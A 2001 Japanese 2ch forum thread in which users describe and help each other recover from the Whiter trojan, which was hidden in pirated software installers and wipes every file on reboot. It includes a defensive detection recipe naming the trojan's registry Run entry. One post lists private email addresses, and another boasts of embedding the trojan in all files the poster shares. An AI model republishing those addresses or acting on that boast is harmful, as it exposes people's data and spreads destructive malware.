真っ白になってるんですわ。
これって再起動したとき大丈夫・・じゃないですよね?
あとレジストリのrunのところもえらくシンプルに
なってました(一行だけ)。

ちなみに昨夜、MXで落としたFrameMaker6を日本語版か
どうか確認するためにシリアル入力画面まで進めた。

254 :名無しさん@お腹いっぱい。:01/10/11 01:38
>>253
まったく問題なし。

255 : :01/10/11 01:38
>>253
OSとCD焼きプログラムが動ごくなら、速攻でファイル待避させる
もしくは、別PCに移す
あとは…
事後報告きぼん(無責任)

256 : :01/10/11 01:39
勘違いした
たぶん大丈夫

257 : :01/10/11 01:45
254と255のどちらを信用したらええのん?
というか、信用するという点では言わずもがなで
しょうけど。つうかこれネタじゃなくマジっす、マジ。
ちなみにLANで繋いでる方で焼き準備スタンバってます。

258 : :01/10/11 01:51
ああ、頭真っ白や・・・。
まさか自分のハードディスクまで真っ白になりそう
なんて・・。心拍数上がってます。どうしよう。

259 : :01/10/11 01:51
>>257
いや、症状を見たところ大丈夫だと思うんだけど
とにかく割れのexeを実行した時点で、「大丈夫」って言い切れないんだよ
だから、今、バックアップは絶対にしておくことをおすすめします

260 : :01/10/11 01:55
>>259
はい、そのつもりですけど、なにやらOSは再インスト
しなけりゃダメなんじゃないでしょうか。
とにかくHDD上のすべてのデータ、バックアップする
つもりでがんばります、アドバイスありがとうございました。
つーか笑えねえ、むかつく。

261 :名無しさん@お腹いっぱい。:01/10/11 02:01
>>260
いや、そんなに悲観的にならなくても、
恐らく90%以上の確率で大丈夫
>>253のAUTOEXEC.BATとCONFIG.SYSに関する記述は、
それでまったく問題ないよ

どちらに転んでも、一応
どうなったかだけ報告してね

262 :名無しさん@お腹いっぱい。:01/10/11 02:01
大丈夫だって言ったのに。
>>256>>255 に対して言ってんだろ。
特に設定してなければ
AUTOEXEC.BATとかCONFIG.SYSは0バイト。

263 :名無しさん@お腹いっぱい。:01/10/11 02:05
>>262
ただ、「絶対大丈夫」と言い切れない要因がある(割れ物のことね)

264 :名無しさん@お腹いっぱい:01/10/11 02:05
"ちなみに昨夜、MXで落としたFrameMaker6を日本語版か
どうか確認するためにシリアル入力画面まで進めた"
あなたが悪い! (-_-;) ノートン先生使ってるの?
もう、バックアップ終わったかしら?
RE-IPL後が、楽しみだわね。
結果、RES キボン

265 : :01/10/11 02:07
ホントにホントにそうなんですか?
ああ、でも今はもう正常な思考ができない。
今までシコシコ貯めてきたファイルが全部お釈迦に
なるかと想像するとおれは発狂するか自殺するかも
しれない。とにかくバックアップ取ってから事後報告
しますんで、それでは。

266 :名無しさん@お腹いっぱい。:01/10/11 02:11
こんなこと言いたくないけど、「お節介のバカがまた言ってるよ」程度に聞き流してね
割れ物を扱うときは、慎重に慎重を重ねても足りないから、
貴重なファイルのあるPC上での実行は極力さけるべき

んー、やっぱり説教臭いか…
まあ、透明あぼーんでもしておいてくれ
消されても恨まないよ

267 :名無しさん@お腹いっぱい:01/10/11 02:11
結果期待して、AGE ↑↑↑

268 : :01/10/11 02:13
>>264
ノートン先生は、いつか入れようと思いながら
今日まで来ちゃいました(゚∇゚)>
とにかくMXで落とした割れずはバックアップ取ったら
封印することにします。ただのコレクター目指してた
だけの厨なもんで。

269 : :01/10/11 02:18
>>267
えーと、トータル60Gのバックアップを4倍速の
粗大ゴミでやりますので、かなり時間が掛かるものと
推察されます。それでは今度こそ。板汚しすいません。

270 :名無しさん@お腹いっぱい。:01/10/11 03:00
つーか単純に、システムフォルダに
Whismng.exe
があるかどうか試してみればいいじゃん。
あればクロ。無ければシロ。そんだけ。
この33バイトウイルスに関してはね。

271 :233:01/10/11 07:05
OSは、数ヶ月前に買ったばかりのMEです。
壊れるなんてありえないと思うのですが・・・・。
一番怪しいのはFlash5.0かと・・突然の更新をしたあと気になってLOG?を見てみたら
エラーでインストールされたのかはっきり分からない状態でした。システム的なこと
解らないからかもしれませんが。。。。 あと気になる文字が・・署名が見つからないとか
書いてあったような・・未署名じゃなかったハズなのに!
あと心当りがあるといえば、HTMLでメール送ってくる人がいたってことでしょうか。
それが最後の受信でした。前はメーラで弾けるのを使っていたのですが、買い換えてからは
OEとOutlookを併用していたので、勝手に受信してしまう。
っていうか、テキストで送ってって言っているのに・・・。
ちなみに、その人のPCよく壊れて修理だしているっていうし(-_-;)

何度やってみてもCドライヴのバックアップできませんでした。
レジストリが見つからないとかでてきます。
デスクトップとIEのお気に入りとメールだけ修復できればいいのですが。。。
保証期間内だから交渉可能なのでしょうか?

272 :名無しさん@お腹いっぱい。:01/10/11 07:12
>>271
その症状は、少なくともこのスレで話題になっているウイルスではないです。
他のスレで聞くべきだと思う。

273 :名無しさん@お腹いっぱい。:01/10/11 07:15
分かりました。
どこに行けばいいでしょうか?

274 :風の谷の名無しさん:01/10/11 23:20
アヒャヒャヒャヒャヒャ

275 :名無しさん@お腹いっぱい。:01/10/12 00:57
事後報告が無いってことは…
逝っちゃったか???

276 : :01/10/12 01:01
添付がFLASH装うのって、NakedWife?
でも、なんか違うね。。。

277 :名無しさん@お腹いっぱい。:01/10/12 01:06
>>276
まあ、こういうのはいろんな種類のが湧いて出てくるからね

278 :276:01/10/12 01:19
>>277
確かに。。毎週沸いてるね(w
ボウフラみたい。
ちょくちょく薮に入ってると特にそう思う。
でも、蛇には噛まれないようにしないと。。
たまーに、蝮みたいの居るし。

279 :名無しさん@お腹いっぱい。:01/10/12 05:19
ところでこの33バイトウイルス(?)は
W2kでも有効?

280 :名無しさん@お腹いっぱい。:01/10/12 05:50
>>279
過去ログ全部読んだ?

281 :名無しさん@お腹いっぱい。:01/10/12 09:11
自分も昨日にたようなやつにやられだです
フォルダ構造だけ残して
すべてのファイル全部消されたです
物理的まで違うドライブまで全部。
これはウイルスか不正アクセスか区別がつかなくて困ってます

282 :名無しさん@お腹いっぱい。:01/10/12 09:32
>>281
多分同じ症状ですね。
再起動をする前に、何かクラックアプリをインストールしました?
したとしたら、ソフト名を書いてください。

283 :名無しさん@お腹いっぱい。:01/10/12 10:19
>>281
俺もまさに同じ症状に遭ったよ(;´Д`)

Win2000なんだけど、再起動してログオンが済んだら
なんかHDDがガリガリ言いながらデスクトップから次々アイコンが減ってったの。
「あれ? おっかしーなー、なんか調子悪いのかなー」と思いながら
もう1回再起動したらNTLDRが見つからなくて起動不能。
FDDから起動して惨状を見て激しく鬱になった。

全ての物理ドライブの全てのファイルが消えていた。
(共有違反で消せなかったexplorer.exeなどいくつかのシステムファイルは除く)
けど全てのフォルダは残っていた。(中身空っぽで)
フォルダが残っているなら、と
すかさず適当なパーティションに適当にOS入れて
Norton UnErase したけど大半のファイルは修復できなかった。
けど5〜10%程度のファイルは修復できた。
てことはこのスレの33バイトウィルスとは別なのかな?

その症状が起こる前って3日くらい起動しっぱなしで
色々落としてたから、何が原因だったのかさっぱり見当つかないよ…

284 :283:01/10/12 10:23
ちなみにその被害に遭ったのは9月29日。
交換を持ちかけられた相手から適当に
速パック7とか携帯電話のメモリ編集ソフトとか
使いもしないのにカウンター入れて落としたのを
ちゃんとセットアップできるか確認した記憶がある。
たぶんそれ以外にも色々落としたんじゃないかと思うんだが
あまり覚えていない。
俺と共通点ある人いない?

別にいらないソフトまでやたらめったら落とすもんじゃないと悔やんだよ…

285 :283:01/10/12 10:24
あ、あとネットワーク接続した別のマシンの共有フォルダは無傷でした。
(ひょっとしたらその時たまたまつないでなかっただけかもしれないけど)

286 :名無しさん@お腹いっぱい。:01/10/12 10:42
>>283
おそらくこのスレのウイルスと同じ。

>けど5〜10%程度のファイルは修復できた。
>てことはこのスレの33バイトウィルスとは別なのかな?

それは、ウイルスが発動する前までに、手動で削除していたファイルでは?
普通に消したファイルならば復活できるしね。


287 :283:01/10/12 10:45
>>286
あ、なるほど。そうかも。
該当のディスクはもうみんなフォーマットして再インストールしちゃったから
何が復活できて何が復活できなかったかとか詳しく覚えてないんだけど
そう考えると結構納得逝く気がする。
復活して欲しいものに限って復活しなかった気がするし…

288 :名無しさん@お腹いっぱい。:01/10/12 11:20
>>284
これはセットアップ確認だけでも有効になる模様
ここで語られてる菌でまず間違いないでしょう。

289 :名無しさん@お腹いっぱい。:01/10/12 12:28
sigefumi@cts-net.ne.jp
piko-@jp-t.ne.jp
rukia@hkg.odn.ne.jp
tune@yellow.plala.or.jp
blackwidow@anet.ne.jp
zbf46927@boat.zero.ad.jp
ccv21590@hkg.odn.ne.jp
kengo@d9.dion.ne.jp
aokin_doll@anet.ne.jp
siosai@itpmail.itp.ne.jp
natamoky@zb4.so-net.ne.jp
shikata@nyc.odn.ne.jp
mrk3@f4.dion.ne.jp
yasuhumi-i@tokai.or.jp
whxd777@docomo.ne.jp
you1991@muj.biglobe.ne.jp
yoshiteru-s@docomo.ne.jp
ye183@viola.ocn.ne.jp
nyao@pop02.odn.ne.jp
xxxx777xxxx777@docomo.ne.jp
ye183@viola.ocn.ne.jp
matsuda@f-maria.co.jp
yukinon@poppy.ne.jp
cds09690@par.odn.ne.jp
kasugan.@docomo.ne.jp
0507s-0920y@hcc5.bai.ne.jp

uirususaiaku!

290 :281 :01/10/12 12:58
海外版のライトウエーブ7を入れたような気がします
たぶんそれだと......。怖いです

291 :名無しさん@お腹いっぱい。:01/10/12 13:04
>>290
間違いないです。
Lightwave7のクラックに入っているという情報があります。
他のスレでLW7をいれて同じ症状になった人がいました。

292 :広湯:01/10/12 13:05
上のアドの書き込みはどうゆう人のアド?

293 : :01/10/12 13:47
ご愁傷様です。漏れはワレやっててそういう目にあったことない
けどこれから気をつけます。

294 :名無しさん@お腹いっぱい。:01/10/12 13:56
これってFCDならインストしても大丈夫なのだろか?

295 :名無しさん@お腹いっぱい。:01/10/12 14:21
>>294
絶対安全ってことはないと思うけど安全な方だと思う。

296 : :01/10/12 16:13
>>148
だから最近IPVR人気ないのか........なんかキューが入らなくなってきたから
おかしいとは思っていたが.......自分の持ってるのはクリア済みセーブデータ
付なんだけど。
イメージにわざわざウイルスを仕込む人はあまりいないだろうけど、
やっぱり怖いよね.........

297 :風の谷の名無しさん:01/10/12 21:01
チンコ

298 :名無しさん@お腹いっぱい。:01/10/13 00:47
このスレまじで役立った...感謝

299 :名無しさん@お腹いっぱい。:01/10/13 01:08
ウィルス収集の趣味が、人の役に立てて嬉しいです

300 :名無しさん@お腹いっぱい。:01/10/13 01:25
Lightwaveってあの結構高いグラフィックソフトか
高価なグラフィックソフトとかだと釣れる奴も多いだろうね
くわばらくわばら

301 :名無しさん@お腹いっぱい。:01/10/13 01:28
>299
最低限コレだけはやっときましょう。気休めだけど。

・OEの「連絡先」は、極力バックアップ取るようにして空にしとく。
#但し、人柱用に友人のメアド一つだけ入れとく(w

・ブラウザのキャッシュも電源落す前には必ず消しとく。
・受信フォルダも送信フォルダも毎日掃除。

・・良く解るよ。人間、時として取り返しつかないこと無
性にしたくなるもんさ(w

302 :名無しさん@お腹いっぱい。:01/10/13 01:41
とりあえずまとめてみた。足りないとこやおかしなとこがあったら誰か直して。
-------------------
症状:OS起動後、ハードディスクに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーがでる。フォルダの
みを残して全ファイルが削除されている。OSを終了すると二度と起動しなくな
る。他のマシンなどで残ったファイルを復活させるとすべて33バイトになる。

原因: Whiterウイルス
割れ物のインストーラーなどに仕込まれていて、知らずに割れ物をインストール
すると感染する恐れあり。このウイルスが -next のコマンドライン引数で実行
されると、ファイルサイズを0バイトにしたあと削除するため、フォルダのみを
残し全ファイルが削除される。Adobe製品やLightwave、エロゲなど、感染源多数
報告あり。

対策:割れ物などの怪しいソフトををインストールした後(必ずOSを終了する前)
は、レジストリの以下のキーを調べる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Whistler %System%\whismng.exe -next
という記述があればすでに感染している。すぐにそのキーを削除すればよい。
別の方法としては、システムフォルダ内にwhismng.exeがないか調べる。あれば
削除、もしくは別の場所に移動する。ただし名前を変えられるとこの方法は使え
ない。OSを再起動してからでは手遅れになるので注意。
また、ノートン先生はこのウイルスを検出できるらしい(未確認)。

関連リンク
http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

303 :名無しさん@お腹いっぱい。:01/10/13 01:51
LANでつながってるPCのHDも消えちゃったって人と
問題なかったっていう人の、ふた通りあるんだよね

304 :名無しさん@お腹いっぱい。:01/10/13 01:52
今このスレを全部読んだのですが、いまいちよくわかりません。
予防策としては
何かをインストールした後に
WINNT\System32ファルダ内を「whismng.exe」で検索し、検索にヒットしなければ安全ってことですか?
レジストリ内も検索する必要があるのでしょうか?

305 :名無しさん@お腹いっぱい。:01/10/13 01:52
>>302
OKOK。素晴らしい。

306 :304:01/10/13 01:53
>>302を読む前に書き込んじゃいました。ごめんなさい・・・

307 :名無しさん@お腹いっぱい。:01/10/13 01:54
LANの場合の消える条件としては、
ネットワークドライブの割り当てをしているかどうか、ということ。
たとえば、Gドライブにネットワーク上のあるフォルダを割り当てていると、
そこもローカルのGドライブとみなし、削除する。
いたってシンプルな理由。

308 :名無しさん@お腹いっぱい。:01/10/13 01:56
>>307
目から鱗
お恥ずかしいですsage

309 :308:01/10/13 01:57
日本語変になってしまいました
とにかく恥ずかしい…

310 :名無しさん@お腹いっぱい。:01/10/13 01:59
ということで、症状はこんな感じがいいと思うがどうか?

---
症状:OS起動後(ログオン後)、ハードディスクに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーがでる。フォルダの
みを残して全ファイルが削除されている。ネットワークドライブに割り当てられている
LAN上のドライブも同じように削除される。OSを終了すると二度と起動しなくなる。
修復ソフトなどでファイルを復活させるとすべて33バイトになっており、事実上復活不可能。

311 :名無しさん@お腹いっぱい。:01/10/13 02:06
怪しいソフトを入れた後には必ず、
レジストリ内をWhistler %System%\whismng.exe -nextで検索かければ
間違いない、という認識でokですか?

312 :名無しさん@お腹いっぱい。:01/10/13 02:16
現状で、Whistlerに関しては大丈夫みたいだけど。。。

起動時読み込みだけが自爆ぢゃ無い。。
HKEY_LOCAL_MACHINE〜CurrentVersion\Run
・・だけが、起動時読み込みぢゃ無い。。

若し、誰かがある意図で割れに組み込んでるとしたら
後は組み込む奴のアイデア次第。
脅かすつもりでなく。。

313 :名無しさん@お腹いっぱい。:01/10/13 02:19
>>312
それを言ったらきりがないと思われ。
とりあえず厨房向けにはあれでよいと思う。

314 :名無しさん@お腹いっぱい。:01/10/13 02:26
>>311
とりあえず -next という文字列が特徴的なので -next で検索かければいい
んじゃない?漏れだったらそれでやると思う。
たとえば %System%のところはProgram FilesとかTmpとか簡単に変えられ
そうだけど、-next っていう引数を変えるのはめんどくさそうなので。

>>312
ある意図っていうのが気になるヨ。どんな意図が考えられる?
貧弱な漏れの脳みそには考えつかないヨ。

315 :312:01/10/13 02:43
>>313
そだね。。。同意。
しっかし、こんだけの破壊ルーチン組んであって、尚且つ伝染させるのに
メール使わないで、、、直結ファイルシェアリング恐るべし。。
確実にウイルス実行させる要素としては十分なのか。。割れは。

>>314
組む奴にしてみれば大義名分立つし被害届も出難いし、今後的に用心する
に越した事無いね。色々出てきそう。。←この辺も有るかな「ある意図」
・・感染被害を自分の手はなるべく汚さずに広げると。vir厨にありがち。


組む奴が純粋?なvir厨で無い場合も有るだろうけど。。。その方が厄介
かな。

316 :名無しさん@お腹いっぱい。:01/10/13 02:44
これから先ファイル名や潜伏先を変えながら
しぶとく生き続けることも考えられ。

317 :名無しさん@お腹いっぱい。:01/10/13 03:11
>>312
というより、ここはWhistlerのスレだからいいんだよ。
302もWhistlerに関してのまとめでしょ。

318 :名無しさん@お腹いっぱい。:01/10/13 03:14
>>312
>起動時読み込みだけが自爆ぢゃ無い。。
>HKEY_LOCAL_MACHINE〜CurrentVersion\Run
>・・だけが、起動時読み込みぢゃ無い。。

んなことは誰でも知ってる。
いったい誰に対してのレス?

319 :283-285:01/10/13 03:37
>>307
なるほど。
漏れはドライブ名を割り当ててはいなかったから無事だったのか。

320 :名無しさん@お腹いっぱい。:01/10/13 03:58
おれも233に近い。同じかどうかはわからない。
HDDフォーマット後に、XP2600をクリーンインストールそしてMUIをインストール
そしてantivirus2002Eをインストール。どれもMXで最近よく出回っているやつ。
OS標準のプログラムをいろいろ起動したり、OS再起動しても問題なく例のwhismngも
検索で出てこない。ここまで問題なし。
でインターネットに繋ぎノートンをアップデート問題なし。ウイルス見つからず。
ここで、興味本位にXPのWINDOWS UPDATEができるのかMSのHPに繋いだら、
FLASHの更新がどうたらこうたらとダイアログがでたので「OK」ボタンか何かを押した。
その後からだったと思うが、妙にエラーめーっセージが出だしマイクロソフトに
エラー報告をするかどうかのダイアログが度々でるようになった。それで再起動しよう
と思いデスクトップ上のアイコンがすぺて消えた後、終了できずHDDがうなりだした。
まったく起動できなくなったのでCD-ROMから上書きインストールしたら起動。
ファイルは消えてはなかった。なんだったんだ???

321 :名無しさん@お腹いっぱい。:01/10/13 04:08
>>320
それはWhistlerとは全然関係ないと思うよ。

322 :名無しさん@お腹いっぱい。:01/10/13 16:12
>>320
ブラウザはIE5.5SP2?

323 :名無しさん@お腹いっぱい。:01/10/13 20:37
そんなことより聞いてくれよ>>1よ。スレと関係おおありなんだけどさ。
昨日、家のパソコン起動したんです。パソコン。
そしたらなんかファイルがめちゃくちゃ消えてくんです。(;´Д`)

324 :名無しさん@お腹いっぱい。:01/10/14 00:34
>近頃
Whistlerって書いてるけど、Whiterなんでしょ?
ういるす名。

325 :名無しさん@お腹いっぱい。:01/10/14 00:37
>>324
33バイトに書き換えちゃうのは、Whistlerだと思う

326 :名無しさん@お腹いっぱい。:01/10/14 02:37
日付: 2001/10/14 、 時刻: 1:29:48 、 ::::: (::::: 上)
ファイル
C:\Documents and Settings\****\Local Settings\Temporary Internet Files\Content.IE5\WV332OPD\fst[1].js
は Trojan.JS.Clid.gen ウィルスに感染しています。
このファイルを修復できません。


日付: 2001/10/14 、 時刻: 1:29:48 、 ::::: (::::: 上)
ファイル
C:\Documents and Settings\****\Local Settings\Temporary Internet Files\Content.IE5\WV332OPD\fst[1].js
は Trojan.JS.Clid.gen ウィルスに感染しています。
ファイルへのアクセスが拒否されました。


ノートンでこんなんになりました
再起動しても平気かなぁ??

327 :名無しさん@お腹おっぱい。:01/10/14 03:12
こんなんがNimdaみたいな勢いで広まったら怖いなー。。

328 :326:01/10/14 03:14
まだ再起動してないっす・・・

329 :名無しさん@お腹いっぱい。:01/10/14 04:26
少しは調べれば?
ttp://www.symantec.com/region/jp/sarcj/data/t/trojan.js.clid.gen.html

おまけにこのスレとは関係なし。
Whistlerか調べたいなら、もっとこのスレ読めよ。

330 :名無しさん@お腹いっぱい。:01/10/14 05:07
俺もずっと思っていたんだけど、このウイルスの名前は "Whiter" でしょ。
>>324 が正しいと思う。
Whistler のキージェネに仕込まれていたから Whistler っていう名前が
ところどころに出てきていると思っていたのだけど違う?
間違ってたら指摘してください。

331 :326:01/10/14 05:54
>>329
シマンテックは一番初めにみましたよ

ただ
Trojanで探したんで 勘違いしてたんです
はい ごめんなさい
そんな命令口調でかかなくってもねぇ・・・



332 :名無しさん@お腹いっぱい。:01/10/14 07:00
名前が議論になってますが、シマンテックで登録されているwhiterで
統一したほうがいいと思います。

トレンドマイクロはwhistlerというウィルスがありますが、その症例は
ファイルサイズを1バイトにするだけです。しかしここでの症例は
33バイトにした後削除するという明らかに違うウィルスなので
分けて使ったほうがいいと思います。

ということはウィルスバスターは対応してないのかも。

333 :名無しさん@お腹いっぱい。:01/10/14 11:56
ノーd先生曰く

W32.Whiter.Trojan

W32.Whiter.Trojan は、Windows XP(Whistler)の
キー生成プログラムを装ったトロイの木馬です。

このトロイの木馬が起動すると、メモ帳(Notepad.exe)を開き、
一見正当に見えるキーを表示します。しかし実際には、
そのキーは正当なものではなく、ランダムに生成されたただの数値です。
このキーが表示されている間にトロイの木馬は自分自身をシステムに
挿入し、コンピュータが次に起動されたときにハードディスク上のすべての
ファイルを削除します。


別名: Trojan.Win32.Whiter.a, W95/Phistler.A

種別: トロイの木馬

感染サイズ: 57,344 バイト

発見日: 01/09/24

対応日: 01/09/24

334 : :01/10/14 13:31
"Whistler"っていう単語が出てきたのは>>72から
Dimensions3のセットアッププログラム実行後に出来たプログラムが
whismng.exe で、レジストリを見ると"Whistler"っていう表記がでてくる

僕は厨房なので、レジストリに出てくる"Whistler"っていう表記が何を意味するのかわからないし、
シマンテックとかが名前を決めてるのなら、それに従ってればいいと思う
ただ、名前ぐらいでそんなにムキになるのはどうかと思う

335 :名無しさん@お腹いっぱい。:01/10/14 13:37
そうだね、名前なんてどっちでもいいよね。

336 :名無しさん@お腹いっぱい。:01/10/14 21:53
>>332

自分はそのトレンドマイクロでいう「whistler」にやられた厨房です。
このスレ見てて自分の症状とは違うなーと思っていたところでした。
おっしゃる通り、削除や33バイト等ではなく全て1バイトにされてしまいます。

そこでひとつ質問なんですが、こっちの「whistler」で1バイトにされたファイルは
修復可能なんでしょうか?
FinalData(パーソナル)を実行しましたが、過去に自分で削除したファイルが1割程度
復元出来るだけでした。
トレンドマイクロのウィルスデータベースでは、「システムの修復もできないので
再インストールをする必要がある」としか書かれていませんでした…(鬱

337 :風の谷の名無しさん:01/10/15 00:07
ワレザー

338 : :01/10/15 00:18
>>337
いまさらそんなこと言われても。。。

339 :名無しさん@お腹いっぱい。:01/10/15 03:45
>>336
多分無理です。
エンタープライズ版は、ファイルサイズを自分で入力する機能がありますが、
全部のファイルに対してそれをやるのはかなり面倒です。

340 :名無しさん@お腹いっぱい。:01/10/15 22:09
ファイナルデータばかり聞くが、Undeleteって使ってる人
ほとんどいないのか?
つい最近までWin2k用はそれしかなかったからそれを
買ったのだが。
もっとも、どちらのソフトでもこのスレのケースでは復旧
できないことに変わりはないであろう。

341 :名無しさん@お腹いっぱい。:01/10/16 02:53
MXで落とした.FCDってヤバイですか?

342 :名無しさん@お腹いっぱい。:01/10/16 04:29
341さん
やばい。というより、MXそれ自体がかなり危険なソフトなんだが、ダウンロード板
の奴らは分かっているのかどうなのか全くこのことについてはふれてない。
要はIP丸出しで交換している事自体がシステム攻撃を食らうことにつながるのは
決して珍しい話ではないと言うことだ。
現に交換掲示板などではそのような被害もでているのが確認されている。
また、本当かは知らないが、UPの場合に決してカウンター画面に出てこない形を
使い、隠れてリスト内データを盗まれていく事、または共有してない部分まで見られて
その部分を勝手に動かされる事などもあったと、報告されているのを読んだ
こともある。もっともこれは本当かは分からない。しかし複数の証言を読んだ事から
あり得ない話でもなさそうだ。
それと、FCDそれ自体はマウントした後を動かせなくても、悪意があって作成中のFCD
の中にトロイを忍ばされている可能性は高い。
普通のエロゲーを起動したら筒抜けになった、などという可能性だ。
相手に情報読まれ放題と覚悟するべき。
相手が黙ってくれるエロゲーはまず疑ってかかった方がいい。
有名なエロゲーを交換したら形だけのダミーでインストールも出来ない
おまけに引っかからないウィルス付きなんて珍しくない。またそんなものが
幾本も交換され、広がっている事もある。
他人にディスク内を解放するだけの覚悟が無いと、痛い思いをするだけだろうな。
虫籠に放って放置だけがむかつくやつの対処法ではないし、初心者が騒いで
知っているやつは黙っている。そういうことを覚悟の上なら交換はいいと思う。

343 :名無しさん@お腹いっぱい。:01/10/16 04:37
すまん、エロゲーをも含めてのFCDだ。最近一般ゲームに飽きて
エロゲーにはまっているなどと、他人とは違う道を行っているため
ついこんな書き方になったしまった。
鬱dasi脳。
エロゲーの部分はゲームかFCDと置き換えて読んでほしい。
ちなみに一般向けだろうが、アプリだろうがエロゲーだろうが、
それ自体で作動される物は皆疑った方がいいと言うこと。
スマソ

344 :名無しさん@お腹いっぱい。:01/10/16 04:39
FCDの中身が見れるツールで、セットアップだけ異常に日付が新しいとか、
そういうファイルを探せば安心でしょう。

345 :名無しさん@お腹いっぱい。:01/10/16 04:50
まあ、それでも日付なんかどうとでも変えられる、だけど人によれば
実に親切な形で交換してくれるし、しかしそれが誰だか全く判らない
のがこの手の問題なんよ。

346 :名無しさん@お腹いっぱい。:01/10/16 05:15
まぁたいていの奴はある程度を覚悟を持ってMXやってるでしょ。

347 :名無しさん@お腹いっぱい。:01/10/16 06:22
俺も5時間前にやられたよ。
必ずウィルスチェックはかけてるんだけどね。

たまたまディスクユーティリティーをいじった後で
リブートした時に「スキャンディスクのスケジュールがある」
って出て2000のブート中にスキャンディスクかかったりして、
これ自体は関係無いとは思うけど、結果これのせいで発見が遅れた。

ブートしてウィンの起動後いつまでたってもHDDがガーガーいってて
ブート途中のメッセージもあったことだし
スキャンディスクか何かだろうと思ったけど、一応調べたのね。
タスクマネージャーでCPU食いまくってるプログラムがあって、
まぁこれがc:\WINNT\system32\whismng.exeだったんだけど
以前に一度MyDocument全部消された経験があったもんで
一応ディスクのサイズとかファイルが消えてないか見てみたら、
Dドライブの空き容量が増えているのに気づいて
さっきのプロセスを停止した。
レジストリから起動されたんだね、このプログラム。
バックアップの翌々日だったし
その後落としたファイルそのものの殆どは
そのディレクトリが消される前に気づいたおかげで消えてなくって、
結局被害は落として展開した後ファイルが大きいから消してしまった
EasyCD5 だけですみました。あ、あと、6時間の時間も無駄になった。

これからはシャットダウンする前にレジストリのぞくようにします。

348 :名無しさん@お腹いっぱい。:01/10/16 06:29
>>347
んで、なんていうソフトに入ってたの?

349 :347:01/10/16 07:00
>>348
今調べています。
でもこのスレで既出のもの以外です。

厨房ですみませんが、
これって感染する前の状態では、
プログラム本体はsetup.exe とかの中に埋もれているのですか?

350 :名無しさん@お腹いっぱい。:01/10/16 07:17
>>349
そうです。setupに入っていると思います。
セットアップを起動した瞬間にインストールされる可能性大。

351 :名無しさん@お腹いっぱい。:01/10/16 13:06
なーるほど、こうやって実装してたのね。
すっげー簡単だし何にでも組み込めるぞこりゃ。

少なくとも言えることは、
俺の共有しているファイルを全てに
今日からこいつが組み込まれているということだ。

352 :名無しさん@お腹いっぱい。:01/10/16 13:17
※皆さん、煽りは完全放置でいきましょう※

353 : :01/10/16 18:01
とりあえずこのスレは定期上げ

354 :341:01/10/16 18:17
親切なレスありがとうございます。
FCDの中身が見れるツールっての探してみます。

355 :名無しさん@お腹いっぱい。:01/10/16 18:25
>>354
俺の場合、FCDをISOに変換して、DAEMON-TOOLSで
そのままマウントしてウイルスチェックしてるよ。
マウントしてもEXEを起動しない限りは大丈夫。

356 :名無しさん@お腹いっぱい。:01/10/16 18:56
学んだので、age

357 :名無しさん@お腹いっぱい。:01/10/16 22:48
結論:
ただより高いものは無し。

358 : :01/10/16 22:57
おれはWINCDR6,0のアプリケーションMXで拾って実行して再起動したら
全ファイル消されてなんもできんくなったよ。

安全か確かめるには、正規版のサイズを公開すればいいんじゃ?

359 :名無しさん@お腹いっぱい。:01/10/17 00:16
>>358
DicMXというのがある。
DicMXとは
ダウンロードしたファイルが完全かどうか調べるためのツールです。
ダウンロードしたファイルのハッシュ値とサイズをサーバーに送り、データベースと比較します。
みなさんが検索を行うたびにデータが蓄積されます。蓄積していきましょう。
http://cloud.prohosting.com/dicmx/

360 :sp:01/10/17 19:07
つーか、お前らは掛かったのか?
おい?

361 :データが消滅:01/10/17 19:10
この被害ここまで広がっていたのですね。実は私もWhiterトロイの木馬の被害にあ
った1人です。
私の場合9月9日に感染し、フォルダ以外の全ファイルを削除されてしまいました。
http://ton.2ch.net/test/read.cgi/sec/997350129/
の649から「データが消滅」という名で書き込んでいるのが私です。9月9日の時
点で被害に遭っている方が3〜4人程度しかいなくあまり相手にされませんでした。
相手にされなかったので新スレもたてないでおきました。

皆さんMXという共有ソフトを入れてそれが原因で被害に遭われた方が多いようで
すが、私はMXというのはやったことがないし、私の場合意味不明な英文メールを
開いてしまったのが直接の原因だと思います。とにかくフォルダ以外のファイルと
いうファイルは全消去(CドライブDドライブ共に)されたので真っ青になりました。

ともかくデータが復旧可能なのかということですが・・・以下の方法はFAT32環境での
話です。(NTFSでも復旧可能なFINALDATAも8月末発売されました)

ファイルの復活にはFINALDATA(http://www.finaldata.ne.jp/)を使います。ただし今
回の被害の場合スタンダード版では復旧は無理でした。そこで業務用のエンタープラ
イズ版を使用します。私の場合、たまたま勤めている会社のPCに導入されていたの
で上司の了解を得、復旧作業に当たりました。

まず、被害に遭った場合、Windowsがまだ生きている場合は何もせず安全な方法で終
了してください。決してデフラグなどは実行しないこと。終了できない場合は強制
的に終了することもやむ終えないです。また被害にあったHDDにwindowsを上書きイン
ストールするのも厳禁です。で、もう一台データが消えてもかまわないHDDを用意
してこのHDDをマスターに繋ぎます。被害にあったHDDをスレーブに繋いでくだ
さい。で、マスターのHDDから起動させます。起動したらFINALDATAエンタープライ
ズ版をインストールしてもいいしCD-ROMからそのまま実行どちらでもかまないので起
動させます。あとは被害にあったHDDに対してファイルの復旧を実行してください。全
クラスタを検索範囲にした方がいいと思います。

HDDの容量によって時間が結構かかると思います。終了すると左のメニューから復旧可
能なファイルが参照できるようになります。通常の被害だとルートディレクトリ以下か
ら復旧可能ですが、今回のトロイは被害が甚大なのでどのファイルも33kbなような大
きさになってしまいこのままでは復旧は無理です。しかしエンタープライズ版では致命
的に被害を受けたファイルでもデータさえ残っていれば「回収ディレクトリ」以下から
復旧可能です。復旧できる可能性のある拡張子を持つファイルは以下の通り。

.AVI.BMP.CDR.DAT.DBF.DBX.DOC.DWG.DXF.EML.GIF.HTM.JPG.JAW.JBW.JSW.JXW
.MBX.IDX.MBX.MBX.MDB.MID.MOV.MP3.MPG.PBL.PCT.PCX.PDF.PSD.SF2.RM.RTF
.tar.tar.gz.TGA.TIF.WAB.WAV.WMF.WRK.ZIP
上の拡張子には出てきませんが、エクセル形式のファイルや一太郎11形式のファイル
も.docと拡張子は変わってしまうもののファイルさえ壊れていなければ復旧可です。

362 :データが消滅:01/10/17 19:11
